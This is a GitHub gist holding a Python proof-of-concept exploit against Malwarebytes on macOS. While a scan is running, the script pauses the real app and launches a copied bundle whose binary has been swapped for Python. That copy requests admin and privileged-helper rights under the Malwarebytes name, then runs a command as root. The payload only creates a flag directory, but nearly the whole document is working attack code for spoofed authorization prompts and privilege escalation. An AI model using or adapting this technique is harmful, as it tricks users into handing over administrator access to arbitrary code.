Skip to content

Instantly share code, notes, and snippets.

@nikolay-n
Created October 13, 2020 18:36
Show Gist options
  • Save nikolay-n/24e69db265df732c59ff42f1d628c4c2 to your computer and use it in GitHub Desktop.
Save nikolay-n/24e69db265df732c59ff42f1d628c4c2 to your computer and use it in GitHub Desktop.
Fake privileged helper auth
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
import os
import sys
import subprocess
import shutil
import time
python_bin = "/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python"
last_bundle_path = subprocess.check_output(['mdfind', "kMDItemCFBundleIdentifier == com.malwarebytes.mbam.frontend.launcher"]).strip("\n")
if not last_bundle_path:
print("Hmm, no Malwarebytes found!!!")
sys.exit(-1)
f = subprocess.Popen(['log', 'stream', '--predicate', 'process == "FrontendApplication" && eventMessage CONTAINS[c] "scanInProgress"', '--debug'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while True:
line = f.stdout.readline()
if "inProgress.title.scanInProgress" in line:
break
print("Malware scan started")
tmp_script = "/tmp/auth.py"
# most of code from https://gist.github.com/pudquick/bc1ad98e7ee0a50fba94
with open(tmp_script, "w") as f:
f.write('''#!/usr/bin/python2.7
import os
from ctypes import CDLL, Structure, POINTER, c_char_p, c_size_t, c_void_p, c_uint32, pointer, byref
Security = CDLL('/System/Library/Frameworks/Security.framework/Versions/Current/Security')
prompt = ""
mkdir_bin = "/bin/mkdir"
flag_path = os.path.join(os.path.expanduser("~/Desktop"), "DirOwnedByRoot")
class OpaqueType(Structure):
pass
class AuthorizationItem(Structure):
_fields_ = [('name', c_char_p),
('valueLength', c_size_t),
('value', c_char_p),
('flags', c_uint32),
]
class AuthorizationItemSet(Structure):
_fields_ = [('count', c_uint32),
('items', POINTER(AuthorizationItem)),
]
class FILE(Structure):
pass
OpaqueTypeRef = POINTER(OpaqueType)
AuthorizationRef = OpaqueTypeRef
kSMRightModifySystemDaemons = "com.apple.ServiceManagement.daemons.modify"
kSMRightBlessPrivilegedHelper = "com.apple.ServiceManagement.blesshelper"
kAuthorizationRightExecute = "system.privilege.admin"
kAuthorizationEnvironmentPrompt = "prompt"
kAuthorizationEmptyEnvironment = None
kAuthorizationFlagDefaults = 0
kAuthorizationFlagInteractionAllowed = (1 << 0)
kAuthorizationFlagExtendRights = (1 << 1)
kAuthorizationFlagPartialRights = (1 << 2)
kAuthorizationFlagDestroyRights = (1 << 3)
kAuthorizationFlagPreAuthorize = (1 << 4)
AuthorizationCreate = Security.AuthorizationCreate
AuthorizationCopyRights = Security.AuthorizationCopyRights
AuthorizationExecuteWithPrivileges = Security.AuthorizationExecuteWithPrivileges
authref = AuthorizationRef()
result = AuthorizationCreate(None, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, byref(authref))
multi_right = (AuthorizationItem*3)()
multi_right[0].name = kSMRightModifySystemDaemons
multi_right[1].name = kSMRightBlessPrivilegedHelper
multi_right[2].name = kAuthorizationRightExecute
rights = AuthorizationItemSet()
rights.count = 3
rights.items = pointer(multi_right[0])
env_items = (AuthorizationItem*1)()
env_items[0].name = kAuthorizationEnvironmentPrompt
env_items[0].valueLength = len(prompt)
env_items[0].value = prompt
env = AuthorizationItemSet()
env.count = 1
env.items = pointer(env_items[0])
flags = kAuthorizationFlagDefaults | kAuthorizationFlagPreAuthorize | kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed
result = AuthorizationCopyRights(authref, byref(rights), byref(env), flags, None)
argv = [flag_path]
argv = (c_char_p * (len(argv) + 1))(*(argv + [None]))
channel = POINTER(FILE)()
if result == 0:
result = AuthorizationExecuteWithPrivileges(authref, mkdir_bin, kAuthorizationFlagDefaults, argv, byref(channel))
''')
mbam_pid = subprocess.check_output(['pgrep', 'FrontendApplication']).strip("\n")
tmp_bundle_path = "/tmp/Malwarebytes.app"
shutil.copytree(last_bundle_path, tmp_bundle_path)
mbam_bin = os.path.join(tmp_bundle_path, "Contents", "MacOS", "Malwarebytes")
os.unlink(mbam_bin)
shutil.copy(python_bin, mbam_bin)
subprocess.check_call(["kill", "-SIGSTOP", mbam_pid])
subprocess.check_call([mbam_bin, tmp_script])
subprocess.check_call(["kill", "-SIGCONT", mbam_pid])
os.unlink(tmp_script)
shutil.rmtree(tmp_bundle_path)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment